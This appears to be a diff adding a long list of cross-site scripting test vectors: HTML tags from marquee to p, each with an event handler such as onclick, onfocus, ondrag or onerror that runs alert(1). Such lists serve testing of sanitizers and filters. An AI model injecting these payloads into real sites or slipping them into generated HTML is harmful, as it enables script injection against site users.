+<marquee onmouseup="alert(1)">test</marquee> +<marquee onpaste="alert(1)" contenteditable>test</marquee> +<marquee onstart=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onbounce=alert(1)>XSS</marquee> +<marquee width=1 loop=1 onfinish=alert(1)>XSS</marquee> +<menu draggable="true" ondrag="alert(1)">test</menu> +<menu draggable="true" ondragend="alert(1)">test</menu> +<menu draggable="true" ondragenter="alert(1)">test</menu> +<menu draggable="true" ondragleave="alert(1)">test</menu> +<menu draggable="true" ondragstart="alert(1)">test</menu> +<menu id=x tabindex=1 onactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforeactivate=alert(1)></menu> +<menu id=x tabindex=1 onbeforedeactivate=alert(1)></menu><input autofocus> +<menu id=x tabindex=1 ondeactivate=alert(1)></menu><input id=y autofocus> +<menu id=x tabindex=1 onfocus=alert(1)></menu> +<menu id=x tabindex=1 onfocusin=alert(1)></menu> +<menu onbeforecopy="alert(1)" contenteditable>test</menu> +<menu onbeforecut="alert(1)" contenteditable>test</menu> +<menu onbeforepaste="alert(1)" contenteditable>test</menu> +<menu onblur=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onclick="alert(1)">test</menu> +<menu oncontextmenu="alert(1)">test</menu> +<menu oncopy="alert(1)" contenteditable>test</menu> +<menu oncut="alert(1)" contenteditable>test</menu> +<menu ondblclick="alert(1)">test</menu> +<menu onfocusout=alert(1) tabindex=1 id=x></menu><input autofocus> +<menu onkeydown="alert(1)" contenteditable>test</menu> +<menu onkeypress="alert(1)" contenteditable>test</menu> +<menu onkeyup="alert(1)" contenteditable>test</menu> +<menu onmousedown="alert(1)">test</menu> +<menu onmouseenter="alert(1)">test</menu> +<menu onmouseleave="alert(1)">test</menu> +<menu onmousemove="alert(1)">test</menu> +<menu onmouseout="alert(1)">test</menu> +<menu onmouseover="alert(1)">test</menu> +<menu onmouseup="alert(1)">test</menu> +<menu onpaste="alert(1)" contenteditable>test</menu> +<menuitem draggable="true" ondrag="alert(1)">test</menuitem> +<menuitem draggable="true" ondragend="alert(1)">test</menuitem> +<menuitem draggable="true" ondragenter="alert(1)">test</menuitem> +<menuitem draggable="true" ondragleave="alert(1)">test</menuitem> +<menuitem draggable="true" ondragstart="alert(1)">test</menuitem> +<menuitem id=x tabindex=1 onactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforeactivate=alert(1)></menuitem> +<menuitem id=x tabindex=1 onbeforedeactivate=alert(1)></menuitem><input autofocus> +<menuitem id=x tabindex=1 ondeactivate=alert(1)></menuitem><input id=y autofocus> +<menuitem id=x tabindex=1 onfocus=alert(1)></menuitem> +<menuitem id=x tabindex=1 onfocusin=alert(1)></menuitem> +<menuitem onbeforecopy="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforecut="alert(1)" contenteditable>test</menuitem> +<menuitem onbeforepaste="alert(1)" contenteditable>test</menuitem> +<menuitem onblur=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onclick="alert(1)">test</menuitem> +<menuitem oncontextmenu="alert(1)">test</menuitem> +<menuitem oncopy="alert(1)" contenteditable>test</menuitem> +<menuitem oncut="alert(1)" contenteditable>test</menuitem> +<menuitem ondblclick="alert(1)">test</menuitem> +<menuitem onfocusout=alert(1) tabindex=1 id=x></menuitem><input autofocus> +<menuitem onkeydown="alert(1)" contenteditable>test</menuitem> +<menuitem onkeypress="alert(1)" contenteditable>test</menuitem> +<menuitem onkeyup="alert(1)" contenteditable>test</menuitem> +<menuitem onmousedown="alert(1)">test</menuitem> +<menuitem onmouseenter="alert(1)">test</menuitem> +<menuitem onmouseleave="alert(1)">test</menuitem> +<menuitem onmousemove="alert(1)">test</menuitem> +<menuitem onmouseout="alert(1)">test</menuitem> +<menuitem onmouseover="alert(1)">test</menuitem> +<menuitem onmouseup="alert(1)">test</menuitem> +<menuitem onpaste="alert(1)" contenteditable>test</menuitem> +<meta draggable="true" ondrag="alert(1)">test</meta> +<meta draggable="true" ondragend="alert(1)">test</meta> +<meta draggable="true" ondragenter="alert(1)">test</meta> +<meta draggable="true" ondragleave="alert(1)">test</meta> +<meta draggable="true" ondragstart="alert(1)">test</meta> +<meta id=x tabindex=1 onactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforeactivate=alert(1)></meta> +<meta id=x tabindex=1 onbeforedeactivate=alert(1)></meta><input autofocus> +<meta id=x tabindex=1 ondeactivate=alert(1)></meta><input id=y autofocus> +<meta id=x tabindex=1 onfocus=alert(1)></meta> +<meta id=x tabindex=1 onfocusin=alert(1)></meta> +<meta onbeforecopy="alert(1)" contenteditable>test</meta> +<meta onbeforecut="alert(1)" contenteditable>test</meta> +<meta onbeforepaste="alert(1)" contenteditable>test</meta> +<meta onblur=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onclick="alert(1)">test</meta> +<meta oncontextmenu="alert(1)">test</meta> +<meta oncopy="alert(1)" contenteditable>test</meta> +<meta oncut="alert(1)" contenteditable>test</meta> +<meta ondblclick="alert(1)">test</meta> +<meta onfocusout=alert(1) tabindex=1 id=x></meta><input autofocus> +<meta onkeydown="alert(1)" contenteditable>test</meta> +<meta onkeypress="alert(1)" contenteditable>test</meta> +<meta onkeyup="alert(1)" contenteditable>test</meta> +<meta onmousedown="alert(1)">test</meta> +<meta onmouseenter="alert(1)">test</meta> +<meta onmouseleave="alert(1)">test</meta> +<meta onmousemove="alert(1)">test</meta> +<meta onmouseout="alert(1)">test</meta> +<meta onmouseover="alert(1)">test</meta> +<meta onmouseup="alert(1)">test</meta> +<meta onpaste="alert(1)" contenteditable>test</meta> +<meter draggable="true" ondrag="alert(1)">test</meter> +<meter draggable="true" ondragend="alert(1)">test</meter> +<meter draggable="true" ondragenter="alert(1)">test</meter> +<meter draggable="true" ondragleave="alert(1)">test</meter> +<meter draggable="true" ondragstart="alert(1)">test</meter> +<meter id=x tabindex=1 onactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforeactivate=alert(1)></meter> +<meter id=x tabindex=1 onbeforedeactivate=alert(1)></meter><input autofocus> +<meter id=x tabindex=1 ondeactivate=alert(1)></meter><input id=y autofocus> +<meter id=x tabindex=1 onfocus=alert(1)></meter> +<meter id=x tabindex=1 onfocusin=alert(1)></meter> +<meter onbeforecopy="alert(1)" contenteditable>test</meter> +<meter onbeforecut="alert(1)" contenteditable>test</meter> +<meter onbeforepaste="alert(1)" contenteditable>test</meter> +<meter onblur=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onclick="alert(1)">test</meter> +<meter oncontextmenu="alert(1)">test</meter> +<meter oncopy="alert(1)" contenteditable>test</meter> +<meter oncut="alert(1)" contenteditable>test</meter> +<meter ondblclick="alert(1)">test</meter> +<meter onfocusout=alert(1) tabindex=1 id=x></meter><input autofocus> +<meter onkeydown="alert(1)" contenteditable>test</meter> +<meter onkeypress="alert(1)" contenteditable>test</meter> +<meter onkeyup="alert(1)" contenteditable>test</meter> +<meter onmousedown="alert(1)">test</meter> +<meter onmouseenter="alert(1)">test</meter> +<meter onmouseleave="alert(1)">test</meter> +<meter onmousemove="alert(1)">test</meter> +<meter onmouseout="alert(1)">test</meter> +<meter onmouseover="alert(1)">test</meter> +<meter onmouseup="alert(1)">test</meter> +<meter onpaste="alert(1)" contenteditable>test</meter> +<multicol draggable="true" ondrag="alert(1)">test</multicol> +<multicol draggable="true" ondragend="alert(1)">test</multicol> +<multicol draggable="true" ondragenter="alert(1)">test</multicol> +<multicol draggable="true" ondragleave="alert(1)">test</multicol> +<multicol draggable="true" ondragstart="alert(1)">test</multicol> +<multicol id=x tabindex=1 onactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforeactivate=alert(1)></multicol> +<multicol id=x tabindex=1 onbeforedeactivate=alert(1)></multicol><input autofocus> +<multicol id=x tabindex=1 ondeactivate=alert(1)></multicol><input id=y autofocus> +<multicol id=x tabindex=1 onfocus=alert(1)></multicol> +<multicol id=x tabindex=1 onfocusin=alert(1)></multicol> +<multicol onbeforecopy="alert(1)" contenteditable>test</multicol> +<multicol onbeforecut="alert(1)" contenteditable>test</multicol> +<multicol onbeforepaste="alert(1)" contenteditable>test</multicol> +<multicol onblur=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onclick="alert(1)">test</multicol> +<multicol oncontextmenu="alert(1)">test</multicol> +<multicol oncopy="alert(1)" contenteditable>test</multicol> +<multicol oncut="alert(1)" contenteditable>test</multicol> +<multicol ondblclick="alert(1)">test</multicol> +<multicol onfocusout=alert(1) tabindex=1 id=x></multicol><input autofocus> +<multicol onkeydown="alert(1)" contenteditable>test</multicol> +<multicol onkeypress="alert(1)" contenteditable>test</multicol> +<multicol onkeyup="alert(1)" contenteditable>test</multicol> +<multicol onmousedown="alert(1)">test</multicol> +<multicol onmouseenter="alert(1)">test</multicol> +<multicol onmouseleave="alert(1)">test</multicol> +<multicol onmousemove="alert(1)">test</multicol> +<multicol onmouseout="alert(1)">test</multicol> +<multicol onmouseover="alert(1)">test</multicol> +<multicol onmouseup="alert(1)">test</multicol> +<multicol onpaste="alert(1)" contenteditable>test</multicol> +<nav draggable="true" ondrag="alert(1)">test</nav> +<nav draggable="true" ondragend="alert(1)">test</nav> +<nav draggable="true" ondragenter="alert(1)">test</nav> +<nav draggable="true" ondragleave="alert(1)">test</nav> +<nav draggable="true" ondragstart="alert(1)">test</nav> +<nav id=x tabindex=1 onactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforeactivate=alert(1)></nav> +<nav id=x tabindex=1 onbeforedeactivate=alert(1)></nav><input autofocus> +<nav id=x tabindex=1 ondeactivate=alert(1)></nav><input id=y autofocus> +<nav id=x tabindex=1 onfocus=alert(1)></nav> +<nav id=x tabindex=1 onfocusin=alert(1)></nav> +<nav onbeforecopy="alert(1)" contenteditable>test</nav> +<nav onbeforecut="alert(1)" contenteditable>test</nav> +<nav onbeforepaste="alert(1)" contenteditable>test</nav> +<nav onblur=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onclick="alert(1)">test</nav> +<nav oncontextmenu="alert(1)">test</nav> +<nav oncopy="alert(1)" contenteditable>test</nav> +<nav oncut="alert(1)" contenteditable>test</nav> +<nav ondblclick="alert(1)">test</nav> +<nav onfocusout=alert(1) tabindex=1 id=x></nav><input autofocus> +<nav onkeydown="alert(1)" contenteditable>test</nav> +<nav onkeypress="alert(1)" contenteditable>test</nav> +<nav onkeyup="alert(1)" contenteditable>test</nav> +<nav onmousedown="alert(1)">test</nav> +<nav onmouseenter="alert(1)">test</nav> +<nav onmouseleave="alert(1)">test</nav> +<nav onmousemove="alert(1)">test</nav> +<nav onmouseout="alert(1)">test</nav> +<nav onmouseover="alert(1)">test</nav> +<nav onmouseup="alert(1)">test</nav> +<nav onpaste="alert(1)" contenteditable>test</nav> +<nextid draggable="true" ondrag="alert(1)">test</nextid> +<nextid draggable="true" ondragend="alert(1)">test</nextid> +<nextid draggable="true" ondragenter="alert(1)">test</nextid> +<nextid draggable="true" ondragleave="alert(1)">test</nextid> +<nextid draggable="true" ondragstart="alert(1)">test</nextid> +<nextid id=x tabindex=1 onactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforeactivate=alert(1)></nextid> +<nextid id=x tabindex=1 onbeforedeactivate=alert(1)></nextid><input autofocus> +<nextid id=x tabindex=1 ondeactivate=alert(1)></nextid><input id=y autofocus> +<nextid id=x tabindex=1 onfocus=alert(1)></nextid> +<nextid id=x tabindex=1 onfocusin=alert(1)></nextid> +<nextid onbeforecopy="alert(1)" contenteditable>test</nextid> +<nextid onbeforecut="alert(1)" contenteditable>test</nextid> +<nextid onbeforepaste="alert(1)" contenteditable>test</nextid> +<nextid onblur=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onclick="alert(1)">test</nextid> +<nextid oncontextmenu="alert(1)">test</nextid> +<nextid oncopy="alert(1)" contenteditable>test</nextid> +<nextid oncut="alert(1)" contenteditable>test</nextid> +<nextid ondblclick="alert(1)">test</nextid> +<nextid onfocusout=alert(1) tabindex=1 id=x></nextid><input autofocus> +<nextid onkeydown="alert(1)" contenteditable>test</nextid> +<nextid onkeypress="alert(1)" contenteditable>test</nextid> +<nextid onkeyup="alert(1)" contenteditable>test</nextid> +<nextid onmousedown="alert(1)">test</nextid> +<nextid onmouseenter="alert(1)">test</nextid> +<nextid onmouseleave="alert(1)">test</nextid> +<nextid onmousemove="alert(1)">test</nextid> +<nextid onmouseout="alert(1)">test</nextid> +<nextid onmouseover="alert(1)">test</nextid> +<nextid onmouseup="alert(1)">test</nextid> +<nextid onpaste="alert(1)" contenteditable>test</nextid> +<nobr draggable="true" ondrag="alert(1)">test</nobr> +<nobr draggable="true" ondragend="alert(1)">test</nobr> +<nobr draggable="true" ondragenter="alert(1)">test</nobr> +<nobr draggable="true" ondragleave="alert(1)">test</nobr> +<nobr draggable="true" ondragstart="alert(1)">test</nobr> +<nobr id=x tabindex=1 onactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforeactivate=alert(1)></nobr> +<nobr id=x tabindex=1 onbeforedeactivate=alert(1)></nobr><input autofocus> +<nobr id=x tabindex=1 ondeactivate=alert(1)></nobr><input id=y autofocus> +<nobr id=x tabindex=1 onfocus=alert(1)></nobr> +<nobr id=x tabindex=1 onfocusin=alert(1)></nobr> +<nobr onbeforecopy="alert(1)" contenteditable>test</nobr> +<nobr onbeforecut="alert(1)" contenteditable>test</nobr> +<nobr onbeforepaste="alert(1)" contenteditable>test</nobr> +<nobr onblur=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onclick="alert(1)">test</nobr> +<nobr oncontextmenu="alert(1)">test</nobr> +<nobr oncopy="alert(1)" contenteditable>test</nobr> +<nobr oncut="alert(1)" contenteditable>test</nobr> +<nobr ondblclick="alert(1)">test</nobr> +<nobr onfocusout=alert(1) tabindex=1 id=x></nobr><input autofocus> +<nobr onkeydown="alert(1)" contenteditable>test</nobr> +<nobr onkeypress="alert(1)" contenteditable>test</nobr> +<nobr onkeyup="alert(1)" contenteditable>test</nobr> +<nobr onmousedown="alert(1)">test</nobr> +<nobr onmouseenter="alert(1)">test</nobr> +<nobr onmouseleave="alert(1)">test</nobr> +<nobr onmousemove="alert(1)">test</nobr> +<nobr onmouseout="alert(1)">test</nobr> +<nobr onmouseover="alert(1)">test</nobr> +<nobr onmouseup="alert(1)">test</nobr> +<nobr onpaste="alert(1)" contenteditable>test</nobr> +<noembed draggable="true" ondrag="alert(1)">test</noembed> +<noembed draggable="true" ondragend="alert(1)">test</noembed> +<noembed draggable="true" ondragenter="alert(1)">test</noembed> +<noembed draggable="true" ondragleave="alert(1)">test</noembed> +<noembed draggable="true" ondragstart="alert(1)">test</noembed> +<noembed id=x tabindex=1 onactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforeactivate=alert(1)></noembed> +<noembed id=x tabindex=1 onbeforedeactivate=alert(1)></noembed><input autofocus> +<noembed id=x tabindex=1 ondeactivate=alert(1)></noembed><input id=y autofocus> +<noembed id=x tabindex=1 onfocus=alert(1)></noembed> +<noembed id=x tabindex=1 onfocusin=alert(1)></noembed> +<noembed onbeforecopy="alert(1)" contenteditable>test</noembed> +<noembed onbeforecut="alert(1)" contenteditable>test</noembed> +<noembed onbeforepaste="alert(1)" contenteditable>test</noembed> +<noembed onblur=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onclick="alert(1)">test</noembed> +<noembed oncontextmenu="alert(1)">test</noembed> +<noembed oncopy="alert(1)" contenteditable>test</noembed> +<noembed oncut="alert(1)" contenteditable>test</noembed> +<noembed ondblclick="alert(1)">test</noembed> +<noembed onfocusout=alert(1) tabindex=1 id=x></noembed><input autofocus> +<noembed onkeydown="alert(1)" contenteditable>test</noembed> +<noembed onkeypress="alert(1)" contenteditable>test</noembed> +<noembed onkeyup="alert(1)" contenteditable>test</noembed> +<noembed onmousedown="alert(1)">test</noembed> +<noembed onmouseenter="alert(1)">test</noembed> +<noembed onmouseleave="alert(1)">test</noembed> +<noembed onmousemove="alert(1)">test</noembed> +<noembed onmouseout="alert(1)">test</noembed> +<noembed onmouseover="alert(1)">test</noembed> +<noembed onmouseup="alert(1)">test</noembed> +<noembed onpaste="alert(1)" contenteditable>test</noembed> +<noframes draggable="true" ondrag="alert(1)">test</noframes> +<noframes draggable="true" ondragend="alert(1)">test</noframes> +<noframes draggable="true" ondragenter="alert(1)">test</noframes> +<noframes draggable="true" ondragleave="alert(1)">test</noframes> +<noframes draggable="true" ondragstart="alert(1)">test</noframes> +<noframes id=x tabindex=1 onactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforeactivate=alert(1)></noframes> +<noframes id=x tabindex=1 onbeforedeactivate=alert(1)></noframes><input autofocus> +<noframes id=x tabindex=1 ondeactivate=alert(1)></noframes><input id=y autofocus> +<noframes id=x tabindex=1 onfocus=alert(1)></noframes> +<noframes id=x tabindex=1 onfocusin=alert(1)></noframes> +<noframes onbeforecopy="alert(1)" contenteditable>test</noframes> +<noframes onbeforecut="alert(1)" contenteditable>test</noframes> +<noframes onbeforepaste="alert(1)" contenteditable>test</noframes> +<noframes onblur=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onclick="alert(1)">test</noframes> +<noframes oncontextmenu="alert(1)">test</noframes> +<noframes oncopy="alert(1)" contenteditable>test</noframes> +<noframes oncut="alert(1)" contenteditable>test</noframes> +<noframes ondblclick="alert(1)">test</noframes> +<noframes onfocusout=alert(1) tabindex=1 id=x></noframes><input autofocus> +<noframes onkeydown="alert(1)" contenteditable>test</noframes> +<noframes onkeypress="alert(1)" contenteditable>test</noframes> +<noframes onkeyup="alert(1)" contenteditable>test</noframes> +<noframes onmousedown="alert(1)">test</noframes> +<noframes onmouseenter="alert(1)">test</noframes> +<noframes onmouseleave="alert(1)">test</noframes> +<noframes onmousemove="alert(1)">test</noframes> +<noframes onmouseout="alert(1)">test</noframes> +<noframes onmouseover="alert(1)">test</noframes> +<noframes onmouseup="alert(1)">test</noframes> +<noframes onpaste="alert(1)" contenteditable>test</noframes> +<noscript draggable="true" ondrag="alert(1)">test</noscript> +<noscript draggable="true" ondragend="alert(1)">test</noscript> +<noscript draggable="true" ondragenter="alert(1)">test</noscript> +<noscript draggable="true" ondragleave="alert(1)">test</noscript> +<noscript draggable="true" ondragstart="alert(1)">test</noscript> +<noscript id=x tabindex=1 onactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforeactivate=alert(1)></noscript> +<noscript id=x tabindex=1 onbeforedeactivate=alert(1)></noscript><input autofocus> +<noscript id=x tabindex=1 ondeactivate=alert(1)></noscript><input id=y autofocus> +<noscript id=x tabindex=1 onfocus=alert(1)></noscript> +<noscript id=x tabindex=1 onfocusin=alert(1)></noscript> +<noscript onbeforecopy="alert(1)" contenteditable>test</noscript> +<noscript onbeforecut="alert(1)" contenteditable>test</noscript> +<noscript onbeforepaste="alert(1)" contenteditable>test</noscript> +<noscript onblur=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onclick="alert(1)">test</noscript> +<noscript oncontextmenu="alert(1)">test</noscript> +<noscript oncopy="alert(1)" contenteditable>test</noscript> +<noscript oncut="alert(1)" contenteditable>test</noscript> +<noscript ondblclick="alert(1)">test</noscript> +<noscript onfocusout=alert(1) tabindex=1 id=x></noscript><input autofocus> +<noscript onkeydown="alert(1)" contenteditable>test</noscript> +<noscript onkeypress="alert(1)" contenteditable>test</noscript> +<noscript onkeyup="alert(1)" contenteditable>test</noscript> +<noscript onmousedown="alert(1)">test</noscript> +<noscript onmouseenter="alert(1)">test</noscript> +<noscript onmouseleave="alert(1)">test</noscript> +<noscript onmousemove="alert(1)">test</noscript> +<noscript onmouseout="alert(1)">test</noscript> +<noscript onmouseover="alert(1)">test</noscript> +<noscript onmouseup="alert(1)">test</noscript> +<noscript onpaste="alert(1)" contenteditable>test</noscript> +<object data=/ onload=alert(1)> +<object data=/ onreadystatechange=alert(1)> +<object draggable="true" ondrag="alert(1)">test</object> +<object draggable="true" ondragend="alert(1)">test</object> +<object draggable="true" ondragenter="alert(1)">test</object> +<object draggable="true" ondragleave="alert(1)">test</object> +<object draggable="true" ondragstart="alert(1)">test</object> +<object id=x onfocus=alert(1) type=text/html> +<object id=x onfocusin=alert(1) type=text/html> +<object id=x tabindex=1 onactivate=alert(1)></object> +<object id=x tabindex=1 onbeforeactivate=alert(1)></object> +<object id=x tabindex=1 onbeforedeactivate=alert(1)></object><input autofocus> +<object id=x tabindex=1 ondeactivate=alert(1)></object><input id=y autofocus> +<object onbeforecopy="alert(1)" contenteditable>test</object> +<object onbeforecut="alert(1)" contenteditable>test</object> +<object onbeforepaste="alert(1)" contenteditable>test</object> +<object onblur=alert(1) tabindex=1 id=x></object><input autofocus> +<object onclick="alert(1)">test</object> +<object oncontextmenu="alert(1)">test</object> +<object oncopy="alert(1)" contenteditable>test</object> +<object oncut="alert(1)" contenteditable>test</object> +<object ondblclick="alert(1)">test</object> +<object onerror=alert(1) data=1 type=image/gif> +<object onfocusout=alert(1) tabindex=1 id=x></object><input autofocus> +<object onkeydown="alert(1)" contenteditable>test</object> +<object onkeypress="alert(1)" contenteditable>test</object> +<object onkeyup="alert(1)" contenteditable>test</object> +<object onmousedown="alert(1)">test</object> +<object onmouseenter="alert(1)">test</object> +<object onmouseleave="alert(1)">test</object> +<object onmousemove="alert(1)">test</object> +<object onmouseout="alert(1)">test</object> +<object onmouseover="alert(1)">test</object> +<object onmouseup="alert(1)">test</object> +<object onpaste="alert(1)" contenteditable>test</object> +<ol draggable="true" ondrag="alert(1)">test</ol> +<ol draggable="true" ondragend="alert(1)">test</ol> +<ol draggable="true" ondragenter="alert(1)">test</ol> +<ol draggable="true" ondragleave="alert(1)">test</ol> +<ol draggable="true" ondragstart="alert(1)">test</ol> +<ol id=x tabindex=1 onactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforeactivate=alert(1)></ol> +<ol id=x tabindex=1 onbeforedeactivate=alert(1)></ol><input autofocus> +<ol id=x tabindex=1 ondeactivate=alert(1)></ol><input id=y autofocus> +<ol id=x tabindex=1 onfocus=alert(1)></ol> +<ol id=x tabindex=1 onfocusin=alert(1)></ol> +<ol onbeforecopy="alert(1)" contenteditable>test</ol> +<ol onbeforecut="alert(1)" contenteditable>test</ol> +<ol onbeforepaste="alert(1)" contenteditable>test</ol> +<ol onblur=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onclick="alert(1)">test</ol> +<ol oncontextmenu="alert(1)">test</ol> +<ol oncopy="alert(1)" contenteditable>test</ol> +<ol oncut="alert(1)" contenteditable>test</ol> +<ol ondblclick="alert(1)">test</ol> +<ol onfocusout=alert(1) tabindex=1 id=x></ol><input autofocus> +<ol onkeydown="alert(1)" contenteditable>test</ol> +<ol onkeypress="alert(1)" contenteditable>test</ol> +<ol onkeyup="alert(1)" contenteditable>test</ol> +<ol onmousedown="alert(1)">test</ol> +<ol onmouseenter="alert(1)">test</ol> +<ol onmouseleave="alert(1)">test</ol> +<ol onmousemove="alert(1)">test</ol> +<ol onmouseout="alert(1)">test</ol> +<ol onmouseover="alert(1)">test</ol> +<ol onmouseup="alert(1)">test</ol> +<ol onpaste="alert(1)" contenteditable>test</ol> +<optgroup draggable="true" ondrag="alert(1)">test</optgroup> +<optgroup draggable="true" ondragend="alert(1)">test</optgroup> +<optgroup draggable="true" ondragenter="alert(1)">test</optgroup> +<optgroup draggable="true" ondragleave="alert(1)">test</optgroup> +<optgroup draggable="true" ondragstart="alert(1)">test</optgroup> +<optgroup id=x tabindex=1 onactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforeactivate=alert(1)></optgroup> +<optgroup id=x tabindex=1 onbeforedeactivate=alert(1)></optgroup><input autofocus> +<optgroup id=x tabindex=1 ondeactivate=alert(1)></optgroup><input id=y autofocus> +<optgroup id=x tabindex=1 onfocus=alert(1)></optgroup> +<optgroup id=x tabindex=1 onfocusin=alert(1)></optgroup> +<optgroup onbeforecopy="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforecut="alert(1)" contenteditable>test</optgroup> +<optgroup onbeforepaste="alert(1)" contenteditable>test</optgroup> +<optgroup onblur=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onclick="alert(1)">test</optgroup> +<optgroup oncontextmenu="alert(1)">test</optgroup> +<optgroup oncopy="alert(1)" contenteditable>test</optgroup> +<optgroup oncut="alert(1)" contenteditable>test</optgroup> +<optgroup ondblclick="alert(1)">test</optgroup> +<optgroup onfocusout=alert(1) tabindex=1 id=x></optgroup><input autofocus> +<optgroup onkeydown="alert(1)" contenteditable>test</optgroup> +<optgroup onkeypress="alert(1)" contenteditable>test</optgroup> +<optgroup onkeyup="alert(1)" contenteditable>test</optgroup> +<optgroup onmousedown="alert(1)">test</optgroup> +<optgroup onmouseenter="alert(1)">test</optgroup> +<optgroup onmouseleave="alert(1)">test</optgroup> +<optgroup onmousemove="alert(1)">test</optgroup> +<optgroup onmouseout="alert(1)">test</optgroup> +<optgroup onmouseover="alert(1)">test</optgroup> +<optgroup onmouseup="alert(1)">test</optgroup> +<optgroup onpaste="alert(1)" contenteditable>test</optgroup> +<option draggable="true" ondrag="alert(1)">test</option> +<option draggable="true" ondragend="alert(1)">test</option> +<option draggable="true" ondragenter="alert(1)">test</option> +<option draggable="true" ondragleave="alert(1)">test</option> +<option draggable="true" ondragstart="alert(1)">test</option> +<option id=x tabindex=1 onactivate=alert(1)></option> +<option id=x tabindex=1 onbeforeactivate=alert(1)></option> +<option id=x tabindex=1 onbeforedeactivate=alert(1)></option><input autofocus> +<option id=x tabindex=1 ondeactivate=alert(1)></option><input id=y autofocus> +<option id=x tabindex=1 onfocus=alert(1)></option> +<option id=x tabindex=1 onfocusin=alert(1)></option> +<option onbeforecopy="alert(1)" contenteditable>test</option> +<option onbeforecut="alert(1)" contenteditable>test</option> +<option onbeforepaste="alert(1)" contenteditable>test</option> +<option onblur=alert(1) tabindex=1 id=x></option><input autofocus> +<option onclick="alert(1)">test</option> +<option oncontextmenu="alert(1)">test</option> +<option oncopy="alert(1)" contenteditable>test</option> +<option oncut="alert(1)" contenteditable>test</option> +<option ondblclick="alert(1)">test</option> +<option onfocusout=alert(1) tabindex=1 id=x></option><input autofocus> +<option onkeydown="alert(1)" contenteditable>test</option> +<option onkeypress="alert(1)" contenteditable>test</option> +<option onkeyup="alert(1)" contenteditable>test</option> +<option onmousedown="alert(1)">test</option> +<option onmouseenter="alert(1)">test</option> +<option onmouseleave="alert(1)">test</option> +<option onmousemove="alert(1)">test</option> +<option onmouseout="alert(1)">test</option> +<option onmouseover="alert(1)">test</option> +<option onmouseup="alert(1)">test</option> +<option onpaste="alert(1)" contenteditable>test</option> +<output draggable="true" ondrag="alert(1)">test</output> +<output draggable="true" ondragend="alert(1)">test</output> +<output draggable="true" ondragenter="alert(1)">test</output> +<output draggable="true" ondragleave="alert(1)">test</output> +<output draggable="true" ondragstart="alert(1)">test</output> +<output id=x tabindex=1 onactivate=alert(1)></output> +<output id=x tabindex=1 onbeforeactivate=alert(1)></output> +<output id=x tabindex=1 onbeforedeactivate=alert(1)></output><input autofocus> +<output id=x tabindex=1 ondeactivate=alert(1)></output><input id=y autofocus> +<output id=x tabindex=1 onfocus=alert(1)></output> +<output id=x tabindex=1 onfocusin=alert(1)></output> +<output onbeforecopy="alert(1)" contenteditable>test</output> +<output onbeforecut="alert(1)" contenteditable>test</output> +<output onbeforepaste="alert(1)" contenteditable>test</output> +<output onblur=alert(1) tabindex=1 id=x></output><input autofocus> +<output onclick="alert(1)">test</output> +<output oncontextmenu="alert(1)">test</output> +<output oncopy="alert(1)" contenteditable>test</output> +<output oncut="alert(1)" contenteditable>test</output> +<output ondblclick="alert(1)">test</output> +<output onfocusout=alert(1) tabindex=1 id=x></output><input autofocus> +<output onkeydown="alert(1)" contenteditable>test</output> +<output onkeypress="alert(1)" contenteditable>test</output> +<output onkeyup="alert(1)" contenteditable>test</output> +<output onmousedown="alert(1)">test</output> +<output onmouseenter="alert(1)">test</output> +<output onmouseleave="alert(1)">test</output> +<output onmousemove="alert(1)">test</output> +<output onmouseout="alert(1)">test</output> +<output onmouseover="alert(1)">test</output> +<output onmouseup="alert(1)">test</output> +<output onpaste="alert(1)" contenteditable>test</output> +<p draggable="true" ondrag="alert(1)">test</p> +<p draggable="true" ondragend="alert(1)">test</p> +<p draggable="true" ondragenter="alert(1)">test</p> +<p draggable="true" ondragleave="alert(1)">test</p> +<p draggable="true" ondragstart="alert(1)">test</p> +<p id=x tabindex=1 onactivate=alert(1)></p> +<p id=x tabindex=1 onbeforeactivate=alert(1)></p> +<p id=x tabindex=1 onbeforedeactivate=alert(1)></p><input autofocus> +<p id=x tabindex=1 ondeactivate=alert(1)></p><input id=y autofocus> +<p id=x tabindex=1 onfocus=alert(1)></p> +<p id=x tabindex=1 onfocusin=alert(1)></p> +<p onbeforecopy="alert(1)" contenteditable>test</p> +<p onbeforecut="alert(1)" contenteditable>test</p> +<p onbeforepaste="alert(1)" contenteditable>test</p> +<p onblur=alert(1) tabindex=1 id=x></p><input autofocus> +<p onclick="alert(1)">test</p> +<p oncontextmenu="alert(1)">test</p> +<p oncopy="alert(1)" contenteditable>test</p> +<p oncut="alert(1)" contenteditable>test</p> +<p ondblclick="alert(1)">test</p> +<p onfocusout=alert(1) tabindex=1 id=x></p><input autofocus> +<p onkeydown="alert(1)" contenteditable>test</p> +<p onkeypress="alert(1)" contenteditable>test</p> +<p onkeyup="alert(1)" contenteditable>test</p> +<p onmousedown="alert(1)">test</p> +<p onmouseenter="alert(1)">test</p> +<p onmouseleave="alert(1)">test</p> +<p onmousemove="alert(1)">test</p> +<p onmouseout="alert(1)">test</p> 